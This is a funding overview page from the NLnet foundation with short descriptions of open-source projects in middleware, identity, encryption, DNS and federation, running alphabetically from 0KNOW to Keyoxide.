Send in your ideas. Deadline February 1, 2025

Middleware and identity

Middleware + identity, including DNS, authorisation, authentication, distribution/deployment, operations, reputation systems

This page contains a concise overview of projects funded by NLnet foundation that belong to Middleware and identity (see the thematic index). There is more information available on each of the projects listed on this page - all you need to do is click on the title or the link at the bottom of the section on each project to read more. If a description on this page is a bit technical and terse, don't despair — the dedicated page will have a more user-friendly description that should be intelligible for 'normal' people as well. If you cannot find a specific project you are looking for, please check the alphabetic index or just search for it (or search for a specific keyword).

0KNOW — Group Theoretic Zero-knowledge Proofs (0KNOW)

Zero-knowledge proof (ZKP) systems help principals verify the veracity of a piece of information without sharing the data. The overall goal of 0KNOW is to develop a lightweight group-theoretic zero-knowledge proof (GT-ZKP) system that can be employed as a cryptographic primitive in many security protocols such as identification, authentication, or credential ownership. They are widely used to preserve confidentiality and ownership of data. GT-ZKP can be seen as a reusable building block for making the future internet trustworthy and secure. In 0KNOW, we will focus on NP group-theoretic problems and design GT-ZKP by finding an appropriate platform group based on the selected difficult problem considering its applicability in the post-quantum era and we will develop an open-source implementation of GT-ZKP.

>> Read more about 0KNOW

Aerogramme — Standards-compliant open-source IMAP server with server-side encryption

Aerogramme is an open-source IMAP server targeted at distributed infrastructures and written in Rust. It is built on top of Garage, a (geographically) distributed object storage software. Aerogramme thus inherits Garage resiliency: its mailboxes are spread on multiple distant regions, regions can go offline while keeping mailboxes available, storage nodes can be added or removed on the fly, etc. Not only does it inherit its resiliency, but it also shares the burden of data management. Aerogramme can be seen as a proxy between the IMAP protocol and Garage protocols (S3 and K2V); it does not handle any data on its own and can be freely moved between machines. Multiple instances can also be run in parallel. As emails are very sensitive, Aerogramme encrypts users' mailboxes with their passwords. Data is decrypted in RAM upon user login: the Garage storage layer handles only encrypted blobs. Aerogramme is to our knowledge the first IMAP server to be designed from the ground up with object storage in mind. Thanks to this design, it is resilient and easy to scale.

>> Read more about Aerogramme

Automating mobile app interception with Frida — Mobile app network introspection for security research

Inspecting mobile app network traffic is a key part of security & privacy research, which helps protect everybody who uses modern mobile devices. It's also an indispensable debugging tool for app developers & QA teams. However, this technique has faced growing challenges from increasing OS restrictions and individual app countermeasures like certificate pinning, such that inspection now often requires advanced reverse-engineering knowledge and significant time-consuming manual setup. In this project, new tools will be built using Frida (a dynamic instrumentation framework) and integrated with HTTP Toolkit (a network debugging tool) to enable one-click targeted interception, making inspecting traffic from mobile apps on a user's own iOS & Android devices accessible to technical users without specialist expertise.

>> Read more about Automating mobile app interception with Frida

ARPA2 resource ACL and HTTP SASL modules for NGINX — Extend consistent access control to NGINX webserver

In most of our daily interactions with a remote server we depend on the application running on the server to properly authenticate the user within the browser session, and to manage who can do what. However, if we want to enforce stronger guarantees with regards to restricted resources and tasks, our options are much more limited. This project from the ARPA2 community wants to move the state of the art in access control forward by combining the extensible SASL standard with a well-defined generic ACL mechanism that also allows for pseudonimity. The project will produce a self-contained library and two modules for a popular web server (NGINX) that use the new library. With the NGINX HTTP SASL module a user-agent can authenticate to the web server using any SASL mechanism the server supports. With the NGINX ARPA2 ACL module the web server can determine whether an authenticated user has authorization for the request that he/she sent. I.e. a user makes the request: "DELETE /messages/10" and the server can then decide based on the authenticated user, the action and resource whether this is allowed or not.

>> Read more about ARPA2 resource ACL and HTTP SASL modules for NGINX

Autocrypt for Thunderbird — Make email encryption extremely simple

Autocrypt is a specification that provides guidance for e-mail clients on how to achieve a seamless user experience. It does so by transparently exchanging keys, almost entirely automating public key management. This reduces the UI to "single click for encryption". The project will create an extension for the Thunderbird e-mail client that brings this experience to its users. The goal is to provide a new extension with a streamlined user experience that requires as little user interaction as possible, without "poweruser" features and performing practical user testing to identify open pain points. The extension will be based on OpenPGP.js, since this can be packaged directly. This will simplify installation and maintenance a great deal.

>> Read more about Autocrypt for Thunderbird

Back to source: trust but verify all the packages — Analysis pipeline for mapping and cross-referencing binaries with source code

Sometimes, the released binaries of an open source package do not match its source code. Or the source code does not match the code in a version control repo. There are many reasons for this discrepancy, but in all cases, this is a potential serious issue as the binary cannot be trusted. Additional (or different) code in the binary could be malware or a vector for unknown software vulnerabilities, or create FOSS license compliance issues.

Back to source creates analysis pipelines to systematically map and cross-reference the binaries of a FOSS package to its source code and source repository and report discrepancies. We call this the deployment to development analysis (d2d) to map deployed code (binaries) to the development code (the sources) and plan to apply this "trust but verify" approach to all the binaries!

>> Read more about Back to source: trust but verify all the packages

Bitmask — User-friendly and secure VPN configuration

Bitmask is a Desktop and Android client designed to achieve a zero-configuration end-user experience for setting up a VPN that connects to a given set of providers - those that follow the LEAP platform specification. To do so, clients rely on providers exposing configuration files on well-known urls, according to their particular setup regarding the available VPN gateways and transports. This project aims at adding low-end routers a new extra platform that users can choose when installing BitmaskVPN. Running VPN software in a commonly available router, with hardware-based user interfaces, will greatly extend the target audience for Bitmask. To achieve this goal, a porting of the BitmaskVPN client will be done in nim, a statically typed language that generates small native and dependency-free executables, allowing the setup of the VPN with the switch of a hardware button. Finally, the resulting port will be packaged for OpenWRT, and build scripts will be made available for providers to offer to their users a ready-to-use flashing image for a selection of routers.

>> Read more about Bitmask

Bonfire Framework — Elixir-based ActivityPub implementation and library with groups and RBAC

Bonfire is an open-source, federated social networking toolkit, designed to empower communities to build custom and federated social networks. The current focus of our project is to improve the stability, performance, and documentation of our codebase, honing a solid framework that enhances user experience and encourages wider adoption. We aim to catch bugs, enhance platform performance, and enrich the developer experience by crafting comprehensive tutorials and documentation. A key aspect of our project involves extending our ActivityPub Library, which underpins the federated nature of Bonfire, and contributing back to the ActivityPub ecosystem by releasing v1.0 of our open-source ActivityPub library. The expected outcomes include a robust, efficient Bonfire framework to be used in production, a surge in developer and community adoption, and contributions to standardize federation protocols.

>> Read more about Bonfire Framework

Charon — Privacy-enabling account management and SSO solution

The overall goal of the Charon project is to build a privacy-enabling account management and SSO solution. For end-users, Charon will allow aggregating multiple existing authenticators (Facebook, Google, etc.) in one place and managing different (and potentially multiple) identities exposed to apps. Apps will not have to worry about user management. And admins of communities using those apps will be able to manage all users in one place, with tools to address abuse.

>> Read more about Charon

Cloud hosting service portability — Service portability for cloud hosting platforms

Configurious Monk or cMonk is a combination of a configuration portal and a set of deterministically configured services that can be used to provide ‘common internet services’ like DNS, E-mail, Matrix, Mastodon, Pixelfed, eduVPN, Nextcloud and more. cMonk's intended use is in large scale cloud deployments, intended for thousands or even millions of users. It is not intended for use in self-hosting situations, but might still be used that way.

The whole project is meant as a service-platform for 'at scale' operatoins, so we are specifically aiming at 24x7x365 availability which requires redundancy and automatic fail-overs everywhere. Configurious Monk is easy to use, and focuses on being ‘out of the way’ of the user. One of its key features is that it lets the user be in complete control. The ultimate form of control being that you can export all your data and configuration and take it elsewhere. Full service portability is the goal. It uses NixOS and the Nix package manager as its base and has an API that can be used to connect the configuration panel to other services.

>> Read more about Cloud hosting service portability

Coko Docs — A modern, open source replacement for Google Docs and Drive

Coko Docs is an open source solution for storing and editing documents using Coko’s publishing technologies. It is the first part of an Open Suite, which will be integrated with professional Open Publishing products. Coko Docs will have a modern collaborative environment for creating, sharing and hosting files in various formats. We aim to build inclusive tools as powerful as Google Drive and Docs, our initial target audience ranges from individuals to small organisations. Our primary goal is an Open Source product with strong Privacy and Security protocols and elegant accessible design. We will utilize the NLnet funding for the first phase of development where we are adding collaborative editing to the integrated document editor, with offline support (for low-bandwidth scenario's).

>> Read more about Coko Docs

Connect by Name — Library for easy connection setup

Connect by Name will be a C library providing an interface that allows a software developer to setup internet connections from an application in the most private and secure manner using well-established and open standards. The interface provided to the software developer will be as simple as “Connect to a service on a domain name” and be flexible enough to fit with different programming paradigms and environments. The library will facilitate composability with other systems and will be extensible with future standards. Our goal is to lower the barrier for developing high-quality software and thereby improve the security and privacy of end users.

>> Read more about Connect by Name

Record Federation for Corteza Clouds — Data federation over ActivityPub

Corteza is a low code platform for building cloud-based web applications. This is typically for private, records-based management purposes (e.g. case management, insurance claims processing, public sector management applications, CRM, ERP), but the uses can also be public if required. It has a modular architecture and its data later, presentation layer and automation layer can each be treated individually. Corteza Record Federation makes innovative use of the ActivityPub standard to describe how content from the Corteza data layer can be broadcast across large federations of Corteza clouds. All data types, simple or compound, entire records and entire data models are supported.

Whether it be energy, finance, health, education or smart cities, many industries need to share complex data in real-time or near real-time, while preserving the digital sovereignty of a large number of disparate actors, protecting the privacy of user data and acknowledging the law of whichever territories in which they find themselves operating. Corteza Record Federation allows for the creation of private networks of decentralised “mini-clouds”, all self-hosted and controlled by their owners, where this data exchange can happen as efficiently and more effectively than on any single centralised cloud.

>> Read more about Record Federation for Corteza Clouds

CryptoLyzer — Cryptographic settings analyzer library

CryptoLyzer is a cybersecurity tool that can analyze the cryptography-related settings of clients and servers in the case of several different protocols. The tool’s primary purpose is to support end users as well as system administrators, security engineers, auditors, etc., in their work by telling them the details of the currently applied setting and informing them about the potential weaknesses and vulnerabilities.

Unlike many other notable free software projects that focus on just one protocol family, CryptoLyzer wants to be as comprehensive as possible. On the one hand, users can analyze several cryptographic mechanisms (e.g., SSH, HTTP security headers, JA3 tag, and later OpenVPN), not just the most popular TLS protocol. On the other hand, it is possible to test both the standard and special or corner cases. Latter means the tool can test hardly supported, experimental, obsoleted, or even deprecated mechanisms or algorithms, which may carry significant risks. The project intends to learn from the existing projects and integrate their solutions to lower the barrier to good cryptographic settings making communication on private and public networks more secure.

>> Read more about CryptoLyzer

CryptPad — Real-time collaboration with client-side encryption

Cryptpad is a secure and encrypted open source collaboration platform. The CryptPad teams project will fund the development of a number of group-focused features to Cryptpad. We'll improve our current implementation of encrypted shared folders to display the permissions possessed by team members for different documents. The capacity to remove a member from a group is difficult in an encrypted system, as the knowledge of encryption keys cannot be taken away once given. We'll implement key-rotation protocols, and develop encrypted mailboxes to facilitate the delivery of new keys to authorized members. The same mailbox system will enable the development of notifications, allowing users to request additional permissions for documents, to invite new members to a group or session, or to inform friends that a document has been updated. Teams organize in many ways, and with the technical components available we'll focus on interfaces which support different modes of coordination, whether the team is hierarchical or self-organizing. Overall, we hope to make it so that the most intuitive way to collaborate is also the most secure.

>> Read more about CryptPad

CryptPad Auth — Implement external identity mechanisms to E2EE collaborative editor

CryptPad is a real-time collaboration environment that encrypts all user-generated content in users' browsers, making it illegible to the host of the service. In this project we'll develop optional extensions to the platform to provide additional layers of protection for such data by pursuing two broad strategies in parallel. For the first, we'll take a top-down approach to security through integration with identity provider services like LDAP or SSO, allowing organizations to apply centrally managed access control policies. For the second, more bottom-up approach, we'll offer tighter control of user accounts through various secondary authentication methods like app-based TOTP or email "magic-links". These new features will provide more choices for the protection of data stored in CryptPad, while also making the platform more approachable for conventional organizations by leveraging their existing points of trusted infrastructure.

>> Read more about CryptPad Auth

CryptPad Blueprints — Server-side encrypted collaborative editor

CryptPad is an end-to-end encrypted collaboration suite that has been under active development for 8 years, and is currently used by hundreds of thousands of people. Its feature set has grown from a simple editor to a full-blown suite with multiple apps, drive, teams, etc. The next generation of CryptPad should be even better - with stronger security guarantees ("perfect forward secrecy", post-quantum crypto), offline-first collaborative editing, and user-driven workflows like password resets. This project will take the first steps in this direction. We document the ways in which cryptography is used on the platform, review the state of the art in applied cryptography and then evaluate the right match with available technologies. Finally we will use these foundations to move forward to a new architecture for CryptPad that will allow for future developments, improved usability, and tighter security.

>> Read more about CryptPad Blueprints

GNU Guix - Cuirass — Continuous integration system for GNU Guix/Linux + Hurd

GNU Guix is a universal functional package manager and operating system which respects the freedom of computer users. The number of supported packages, almost 15.000 on 5 different architectures, is constantly increasing. With the recent efforts adding support for the GNU Hurd operating system, and the ongoing work to easily provide Guix System images for various boards, the need for a strong continuous integration system is critical.

This project aims to improve Cuirass, the GNU Guix continuous integration software to provide binary substitutes for every package or system image within the shortest time. This way, the user won't have to allocate important time and computation power resources into package building. The plan is to add to Cuirass an efficient offloading and work-balancing mechanism between build machines, an improved web interface allowing to monitor machine loads and other build related metrics. A user account section to setup customized monitoring dashboards and subscribe to build failures notifications will also be developed.

>> Read more about GNU Guix - Cuirass

Anonymisation for Data Donations — Facilitate platform scrutinization through anonymised data contributions

Recommendation systems are gatekeepers of online content. Despite their huge influence, these systems are opaque and unaccountable. Thanks to user data donations (e.g. users sharing their personal recommendations), researchers are able to scrutinize algorithms from the outside, even in the absence of official APIs.

Because recommendations are personalised and thus can expose sensitive information, it is essential to guarantee the privacy of our data donors. The project will design and implement a private-by-design data donation infrastructure. With such a scheme, contributions do not have any form of user identification in the database. They are indexed by a cryptographic token, generated from a user-owned secret key. This ensures that there is no visible link between a contribution and a user, or between two contributions from the same user, even with full access to the database.

Users can re-generate the indexes of their contributions using their secret key, allowing them to retrieve or delete their data in part or whole, as required by the GDPR. This project will not only a major enabler for broder platform scrutinization, but also a reusable building block for other projects who need to collect sensitive data with strong privacy guarantees.

>> Read more about Anonymisation for Data Donations

Securing Internet protocols with DIDs — Bridge Decentralized Identifiers with standardised authorisation mechanisms

Many Internet protocols require authentication, e.g. when we check our email account with a username and password, when we authenticate to SSH hosts with public keys, or when we log in to websites using OpenID Connect.

Decentralized Identifiers (DIDs) are a new type of identifier that have associated private keys and can be used for authentication purposes. DIDs are in practice mostly used for exchanging Verifiable Credentials (VCs) between Issuers, Holders, and Verifiers. However, on a more basic level, DIDs can also simply be used as a replacement for usernames/passwords or static public keys, to authenticate by proving control over one's DID. Unlike other identifiers such as usernames or domain names, DIDs do not require a central authority for creating and using them.

In this project, we will work on integrating DIDs with existing Internet protocols that require authentication by developing a new SASL mechanism. The idea is that for example you could log in to your SSH host, email account, IRC server, XMPP server, etc. using your DID, which can improve both usability and security.

>> Read more about Securing Internet protocols with DIDs

Distributed Mechanism Learning — Privacy preserving ways of distributed data usage

Mechanism design is a field concerned with finding rules for economic processes which incentivize self-interested agents to behave in a way, such that a common goal is reached. This project aims to build robust infrastructure for mechanism design via machine learning, to make theoretical results more applicable to practical networked deployments. We plan to do this by finding solutions for the following two problems and making them accessible to developers, while keeping the required domain knowledge to a minimum:

On the one hand, a trusted third party is often assumed to exist, which is supposed to learn and execute the mechanism. In practice, finding neutral trusted parties who do not stand to gain anything from cheating can be hard. To solve this problem, we distribute the computation of the trusted party over multiple computers, ideally controlled by different entities, using multiparty computation. This way, we get a more robust trust base with better alignment of incentives.

On the other hand, current models often assume prior knowledge about preference distributions of agents to learn optimal mechanisms. In practice, this knowledge is not always available. We exchange finding optimal solutions using prior information with finding approximate solutions using no prior information, by way of differentially private learning. This results in more general applicability, especially in settings with sparse information.

>> Read more about Distributed Mechanism Learning

Distributed Private Trust — Decentralised trust and reputation system

The project "Distributed Private Trust" wants to develop a prototype for a trust and reputation system that does not rely on a centralized trusted party and provides users with more privacy than current systems. It uses secure multi-party computation to calculate aggregate ratings without having to reveal individual users ratings to any other party. The project also applies techniques from mechanism design to make the system robust to malicious behaviour of participants, for example by diminishing incentives to submit dishonest ratings.

>> Read more about Distributed Private Trust

django-allauth — Versatile authentication for Django

The goal of django-allauth is to offer a free, secure, well integrated, reusable authentication solution for the Django framework, covering all functionality related to local and social user accounts, multi-factor authentication, in various configurations, with flows that just work. By simpliyfing the complexities associated with user authentication, django-allauth empowers Django developers of all kinds to focus on building their web applications without compromising on the authentication features provided to their end users.

>> Read more about django-allauth

DNSvizor — Privacy-enhanced DNS resolver and DHCP server

A secure and robust DHCP server and DNS resolver with a small resource footprint. We will develop a MirageOS unikernel providing these crucial network services. There are various privacy extensions (such as query name minimisation, and recently published opportunistic encryption between the resolver and the authoritative name server), as well as the possibility to deny resolution of configurable domain names (block lists). For enhanced security, we will implement DNSSec. We will provide DNS-over-TLS and DNS-over-HTTPS services. This will be a drop-in replacement for DNSvizor and Pi-hole.

The project builds on top of MirageOS: a library operating system developed in OCaml — a memory-safe functional programming language. In MirageOS, each service is a separate unikernel with a minimal attack surface that only contains the code required to run it. These unikernels are normally executed as a virtualized machine such as KVM, VirtIO, Xen. MirageOS also supports using a strict security feature of the Linux kernel called seccomp.

>> Read more about DNSvizor

Dolphin authorisation — Avoid privilege escalation in the Dolphin file manager

While acting with elevated privileges, software needs to be distraction-free, clear and user-friendly to avoid security issues and other ways of impairing a system. This project is about enabling average users to do administrative file manipulation within the popular file manager Dolphin securely and with confidence. There is a strong demand for proper integration, enabling less technically-savvy users to safely work with all kinds of files. This project will bring improvements to technical and user-friendliness aspects, so the user will know how to securely accomplish their tasks. This will remove some attack vectors, reduce the risk of falling for social engineering, and reduce user error.

>> Read more about Dolphin authorisation

dream2nix — Automate reproducible packaging for various language ecosystems

Dream2nix is part of the overal effort to create more technical assurances, transparency and robustness within the software supply chain. Dream2nix as a framework allows more open source projects to achieve reproducible builds easier, and helps to create an auditable toolchain across different technical dependencies. The ability to reproduce software builds is of major importance when it comes to verifying if a given binary is the product of a given source code. Reproducibility also increases the maintainability and reliability of small and large software deployments. The nix build system allows for such reproducibility even for complex software systems. dream2nix integrates existing well known programming language specific package managers like npm, yarn or cargo with the nix build system, which will allow many open source projects to benefit from nix' unique properties.

>> Read more about dream2nix

Python supply-chain with dream2nix —  Towards a secure, extensible & reproducible Python supply-chain with dream2nix

We aim to improve the software supply chain of Python with Nix by extending Dream2nix. While the Nix build system offers great reproducibility and auditability features, the effort required to manual write build expressions for all transitive dependencies has lead to the creation of various "lang2nix" tools. Dream2nix is a collection of such tools and a library handling shared concerns, with existing implementations for NodeJS, Rust and Haskell. This project is going to implement first class Python support in dream2nix. Packagers and developers will be able to build standards-compliant projects with nix automatically, while still being able to transparently apply patches where necessary.

>> Read more about Python supply-chain with dream2nix

EGIL SCIM client — System for Cross-domain Identity Management

Managing student information in an effective, secure and GDPR compliant way is crucial for the digitalized school. EGIL is an open source client that facilitates the exchange of student information to external providers of study material or administrative services in a standardized way. It supports attributes based on SCIM (RFC 7642-7644) and extensions, it provides an interface to common directory services and supports federated solutions between a large number of school principals and service providers. This project will improve EGIL's federative capabilities, submit an Internet-Draft on the subject federated accounts provisioning, as well as providing a proof of concept for using SCIM as the standard for exchange of student information. This will eliminate the problems caused by using several different exchange protocols and formats between school principals and service providers.

>> Read more about EGIL SCIM client

The search for ethical Apps — Create custom, self-hostable app stores for Android(-like) OS-es

Once you own a smartphone, often you will want to install additional apps to add additional functionality. In some cases there isn't much choice, like when you as a citizen need to use digital services provided by your government and these are exclusively available through apps. Pre-configured vendor app stores such as the Google Play store and the Apple App store actually require you to agree to privacy-unfriendly terms of service and introduce tracking behaviour - even if you are only going to be installing ethical apps that themselves are open source and privacy-friendly. On top of that, these apps "warehouses" contain a confusing amount of lookalike and dishonest applications that take advantage of naive consumers. Sending users into an app jungle with hundreds of thousands of apps that often resemble each other, leaves users unprotected. In fact, in many cases the whole idea of a "store" doesn't make sense - like when an app is paid for by public funding.

So why not create alternative mechanisms, that give easy and convenient access to apps do not force citizens to sign contracts with commercial third parties. This project will created custom app distribution mechanisms based on F-Droid, allowing anyone to curate a set of applications and distribute these to users directly - without them having to sign away any rights to third parties.

>> Read more about The search for ethical Apps

Federated software forges with Forgejo — Add ActivityPub based federation to Forgejo

Forgejo is a self hosted software forge where developers can work together on software projects and users can report bugs or request features. As of Forgejo version 1.20, when a project is hosted on a Forgejo instance, every developer is expected to create an account on that instance in order to participate. Compared to email, it is as if it was necessary to create an account on gmail.com to send a message to someone with an @gmail.com email address and another on yahoo.fr to send a message to someone with an @yahoo.fr email address. But in 2022 there are two: the W3C ActivityPub protocol published in 2017 and forgefed, an emerging standard (since 2019) to describe activities happening on software forges. They can be used by Forgejo instances to communicate with each other and create a federation of forges continuously communicating with one another instead of a constellation of isolated silos. A federated Forgejo will enable software developers to work on the same project even when they use different Forgejo instances. There will be bridges between isolated Forgejo instances that software projects can use to synchronize in real time.

>> Read more about Federated software forges with Forgejo

ForgeFed — Federating software forges with ActivityPub

The platforms that software developers use for hosting and collaborating on their projects, known as software forges, are centralized systems. And some of the most popular forge websites run proprietary software and controlled by a single company. The values, methods, policies and interfaces of the tools we use with our software projects often don't align with our values and needs, but despite having coding skills, we're powerless to change the situation. ForgeFed aims to put the power back into the hands of the Free Software community, and to allow for systems that are truly trustworthy and support inclusion, freedom, participation, censorship resistance and alignment with needs, by turning software forges into a decentralized network. ForgeFed is a protocol and vocabulary for federation of servers and services related to the Software Development Lifecycle, and an attempt to implement federation into existing free-software forges. ForgeFed has been based on the ActivityPub protocol, which is widely adopted on the Fediverse, and is augmenting it with Object Capabilities, an essential component for distributed secure flexible authorization of collaborative resource access.

>> Read more about ForgeFed

FOSS Code Supply Chain Assurance — Mitigate attacks through software dependencies

It is of the utmost importance to ensure that FOSS packages from public repositories have not been tampered with by malicious actors. This type of compromise is described as an open source "supply chain attack" and these have been increasing significantly. This project is building a new system (which is FOSS itself) to help verify the integrity of deployed code packages and validate their origin with external data sources, with the potential to mitigate attacks on open source packages supply chains such as: detecting if a package in use is matching verified code by matching source and binaries exactly and approximately. Or detecting abnormal code changes that may be signs of malicious modifications and possible attacks on a package.

The key components of this open code and data solution are a Package and File Fingerprints Database, a Code Similarity and Changes Detection Engine, utilities to detect possibly malicious changes in upstream projects, and integration in build system(s). While existing approaches may require a tight control of the whole code supply chain, the approach of this project is designed for practical usage with limited changes to a build and CI/CD pipeline.

>> Read more about FOSS Code Supply Chain Assurance

FOSS Code Supply Chain Assurance II — Add approximate matching capabilities to software vulnerability discovery

It is of the utmost importance to ensure that FOSS packages from public repositories have not been tampered with by malicious actors. This type of compromise is described as an open source "supply chain attack" and these have been increasing significantly. This project is building a new system (which is FOSS itself) to help verify the integrity of deployed code packages and validate their origin with external data sources, with the potential to mitigate attacks on open source packages supply chains such as: detecting if a package in use is matching verified code by matching source and binaries exactly and approximately. Or detecting abnormal code changes that may be signs of malicious modifications and possible attacks on a package.

The key components of this open code and data solution are a Package and File Fingerprints Database, a Code Similarity and Changes Detection Engine, utilities to detect possibly malicious changes in upstream projects, and integration in build system(s). While existing approaches may require a tight control of the whole code supply chain, the approach of this project is designed for practical usage with limited changes to a build and CI/CD pipeline.

This is the second phase of this ambitious project, the focus of which is to enable approximate matching between a database of FOSS packages resources and an actual FOSS package or other code. Moreover, various architectural improvements will be performed to support use at larger scale.

>> Read more about FOSS Code Supply Chain Assurance II

Garage — Lightweight geo-distributed data store compatible with Amazon S3

Garage is a lightweight geo-distributed data store that implements the Amazon S3 object storage protocol. Garage is meant primarily for self-hosting at home on second-hand commodity hardware, meaning it has to tolerate a wide variety of failure scenarios such as power cuts, Internet disconnections, and machine crashes or slow response times. It also has to be easy to deploy and maintain, so that hobbyists and small organizations can use it without a hassle. Garage focuses on allowing users to build geo-distributed clusters, with nodes connected through consumer-grade Wide Area Network (Internet) connections. Garage makes this possible by tolerating relatively high latency between nodes thanks to an innovative design based on the principles of the Dynamo database and that makes heavy use of Conflict-free Replicated Data Types (CRDTs). Garage is written in Rust, with a strong emphasis on stability and robustness. The funding from NLnet will allow development of Garage to continue, tackling in particular the following two aspects: improving compatibility with the S3 protocol and guaranteeing the stability and soundness of the core of Garage's storage engine.

>> Read more about Garage

Garage Administration UI — Easier administration for selfhosted storage buckets

Garage is a lightweight geo-distributed data store that implements the Amazon S3 object storage protocol. Garage is meant primarily for self-hosting at home on second-hand commodity hardware, and aims be easy to deploy and maintain, so that hobbyists and small organizations can use it without a hassle. To further this goal, the Garage admin interface project aims to develop a web UI to make cluster administration easier and more intuitive. This interface will cover the most common operations on Garage cluster: visualizing cluster status; joining new nodes, removing nodes, and changing node configuration; and management of S3 access keys, buckets and bucket configurations.

>> Read more about Garage Administration UI

GNU Name System — Authenticated naming system for the internet from GNU project

Today, the starting point of any discovery on the Internet is the Domain Name System (DNS). DNS suffers from security and privacy issues. The GNU project has developed the GNU Name System (GNS), a fully decentralized, privacy-preserving and end-to-end authenticated name resolution protocol. In this project, we will document the protocol on a bit-level (RFC-style) and create a second independent implementation against the specification. Furthermore, we will simplify the installation by providing proper packages that, when installed, automatically integrate the GNS logic into the operating system.

>> Read more about GNU Name System

GNS Migration and Zone Management — Registrar tools for adoption of GNU Name System

The GNU Name System is in the final stages of standardization. Consequently, calls for migration and large-scale testing as well as interest in running GNS registrars are increasing. In order to address this development this project aims to facilitate the management of GNS zones by administrators and to provide users with means to resolve real-world names.

To ease adoption, a framework for GNS registrars will be developed for zone management. The registrar framework will allow GNS zone administrators to provide a web-interface for subdomain registration by other users.The services may also be provided for a fee similar to how DNS domain registrars operate to cover running costs. The framework is envisioned to support integration of privacy-friendly payments with GNU Taler (https://www.taler.net).

To demonstrate the capabilities of GNS with respect to DNS migration, we plan to run multiple GNS zones ourselves which contain the zone information from real-world DNS top-level domains.A selection of existing top-level domains for which open data exists will be hosted and served through GNS in order to facilitate the daily use of the name system. We are are planning to integrate at least three DNS zones and publish them (regularly) in GNS for users to resolve.

>> Read more about GNS Migration and Zone Management

GNU Taler KYC — Know-Your-Customer support for GNU Taler

This work is about adding proper Know-Your-Customer (KYC) support to GNU Taler to satisfy regulatory requirements to operate the Taler payment service. However, we will not implement our own KYC solution but instead provide a generic way to interface with existing KYC providers and implement several concrete adapters. By supporting multiple providers we will ensure that our KYC abstraction is reasonably generic.

The KYC integration will be configurable to adjust the deployment to the legal requirements of different countries. Finally, we will support attestation of collected KYC information to third parties. This will allow the payment system to assure consumers receiving a bill about the identity of the invoicing business.

>> Read more about GNU Taler KYC

Nix Integration for Hop3 — Nixify the Hop3 self-hosted cloud platform

Hop3 is an open-source orchestration platform designed to simplify the deployment and management of distributed applications across cloud and edge environments. With a focus on flexibility, security, resilience, and ease of use, Hop3 empowers developers and small organisations to take full control of their IT infrastructure and data, ensuring digital sovereignty and avoiding vendor lock-in. The project will enhance the Hop3 platform by integrating Nix, a powerful package manager known for its ability to create reproducible environments, to improve build-time flexibility and ensure consistent, reliable run-time performance. As a test bed and showcase of this integration, we will package 20 diverse and impactful F/OSS applications. Additionally, we will develop new resilience and cybersecurity features to further strengthen the platform's robustness and security.

>> Read more about Nix Integration for Hop3

A proof of concept of identity-based encryption — Make encryption simpler

The project aims to extend the existing attribute-based identity platform IRMA with easy-to-use encryption. The kind of encryption is called Identity-Based. Its main advantage is that key management is simple, so that encryption becomes easy to use, via a plugin to an email client (only Thunderbird in this proof of concept project). The plugin computes the public key of the recipient of a message, from some uniquely identifying attribute of the recipient (typically an email address, but phone number, or citizen registration number could work as well). The receiver of the message will have to prove, via IRMA, possession of the uniquely identifying attribute to some Trusted Third Party (TTP), which will then provide the corresponding private key. Within this project a working set-up will be built. Turning it into a widely usable product will require more work, in follow-up projects.

>> Read more about A proof of concept of identity-based encryption

Icebreaker — Gemini centric viewpoint of coding issues and bug tracking

Modern software projects not only require source code repository management but also tools to plan projects and solve technical problems. Closed source solutions and online commercial services may be convenient, but create significant concerns around control, autonomy and privacy - and they skew discoverability. Icebreaker believes in decentralised approaches which keep the coding repo separate from the project management repo. In terms of cooperation and teamwork, this helps to encourage new, flexible and dynamic approaches. These expectations are solved through the minimalism of the Gemini protocol and its terse Markdown format, Gemtext. It is modern because it is easy to understand; accessible to interact with (whether as a consumer or a contributor); and treats privacy as a foremost priority.

Icebreaker's flagship project, gLean, provides building blocks for navigating and interpreting one or more Gemini content sources (with settings, rulesets, and regex magic). (Non core) modules provide output in alternative formats, including Kanban boards. Creators will control their issue trackers. Creators' terms. Creators' conditions. 'Off-the-shelf' solutions can't compete against gLean's tailored approaches. FOSS communities can choose workflows that match their technical requirements, while supporting autonomy and adhering to their ethical values.

>> Read more about Icebreaker

imap-codec library — Release version 1.0 of the imap-codec library

With an expected volume of 333 billion messages per day in 2022, email is one of today's most common methods to exchange information on the Internet. For better or worse, email is unlikely to go away soon, meaning that even the latest software needs to support it in a trustworthy and resilient way. imap-codec is a misuse-resistant IMAP parsing and serialization library focusing on correctness and security. It should pave the way for a new generation of email clients, servers, and utilities written in Rust and become a reusable building block for the Next Generation Internet. To archive that, it is essential to stabilize the API, improve testing, provide excellent documentation, and establish a welcoming and sustainable open-source environment for imap-codec.

>> Read more about imap-codec library

YunoHost and the Internet Cube — Solutions for DIY-ISP's and self-hosters

YunoHost is a free and open-source server distribution that provides a self-hosted alternative to commercial centralized services, and allows people to take back control over their data. Yunohost aims to make server administration accessible to the general public and ultimately make personal servers as common as desktop computers. Based on YunoHost, the Internet Cube project develops an affordable plug-and-play server that can be bought and easily deployed at home by the general public. In addition to its self-hosting capabilities, it provides a privacy-enhancing WiFi hotspot which protects its users from censorship and metadata leaks. And because it is low-power, it can be used even in remote and offline situations.

>> Read more about YunoHost and the Internet Cube

Interpeer SDKs — Secure and efficient peer-to-peer networking stack

The Interpeer Project's purpose is to research and develop novel peer-to-peer technologies for open and distributed software architectures. The goal is to enable serverless modes of operation for collaborative software with rich feature sets equal to or surpassing centralized client-server architectures. In order to make the Interpeer technology stack accessible to software developers, the goal is to provide SDKs for a desktop and a mobile platform, complete with examples. These SDKs should enable seamless cross-platform data exchange and live editing capabilities by multiple authors.

>> Read more about Interpeer SDKs

IRMA made easy — Usability research into attribute based authentication

Authentication methods, like passwords, often involve a trade-off between usability and security. Secure passwords are a hassle to use, and easy-to-use passwords are often also easy to guess or to brute force. Clearly, there is a need for authentication methods that are both secure and user-friendly. The IRMA mobile app can fill this gap. It was originally developed with a strong focus on providing secure and privacy-friendly authentication. This project will focus on making IRMA easy to use for everyone. We will conduct a formal large-scale evaluation of IRMA that focuses on usability in general as well as on accessibility (i.e. for users with disabilities) in particular. By doing so, usability hindrances can be identified and improved, making IRMA user-friendly and accessible for users with the widest range of capabilities.

>> Read more about IRMA made easy

Keyoxide — Self-hostable identity proofs with bidirectional linking verification

How do you discover which other online accounts across different services and service providers actually belong to the same person? Keyoxide is a secure, privacy-friendly and decentralized platform to manage online identities, uncompromisingly driven by what the user herself wants to share.

